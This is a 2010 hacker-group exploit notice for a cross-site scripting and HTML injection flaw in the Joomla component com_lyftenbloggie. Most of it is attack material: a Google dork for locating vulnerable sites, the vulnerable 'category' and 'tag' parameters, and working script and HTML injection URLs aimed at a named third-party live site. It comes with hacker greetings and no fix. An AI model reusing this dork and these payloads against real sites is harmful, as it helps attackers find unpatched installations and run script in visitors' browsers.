Joomla Lyftenbloggie Cross Site Scripting

1.  
2. ####################################################################
3. # Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability #
4. ####################################################################
5. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6. ______ __
7. /\ _ \ /\ \ __
8. \ \ \L\ \ ____\ \ \___ /\_\ __ __ __ ___ __
9. \ \ __ \ /',__\\ \ _ `\/\ \/\ \/\ \ /'__`\ /' _ `\ /'__`\
10. \ \ \/\ \/\__, `\\ \ \ \ \ \ \ \ \_\ \/\ \L\.\_/\ \/\ \/\ __/
11. \ \_\ \_\/\____/ \ \_\ \_\ \_\/`____ \ \__/.\_\ \_\ \_\ \____\
12. \/_/\/_/\/___/ \/_/\/_/\/_/`/___/> \/__/\/_/\/_/\/_/\/____/
13. /\___/
14. \/__/
15. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
16. ####################################################################
17. # Name: Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability
18.  
19. # Vendor: http://www.lyften.com/products/lyften-bloggie.html
20.  
21. # Date: 2010-12-16
22.  
23. # Author: Ashiyane Digital Security Team
24.  
25. # Contact: XroGuE ~> Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
26.  
27. # Home: www.Ashiyane.org/forums/
28.  
29. # Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !
30.  
31. ####################################################################
32.  
33. [+] Dork: inurl:"index.php?option=com_lyftenbloggie"
34.  
35. ####################################################################
36.  
37. [+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&category=[XSS/HTML]
38. [+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&tag=[XSS/HTML]
39.  
40.  
41. [+] XSS: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<script>var XroG= String.fromCharCode(88, 114, 111, 71, 117, 69);alert(XroG)</script>
42.  
43.  
44. [+] HTML: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<marquee><font color=Blue size=15>XroGuE</font></marquee>
45.  
46. ####################################################################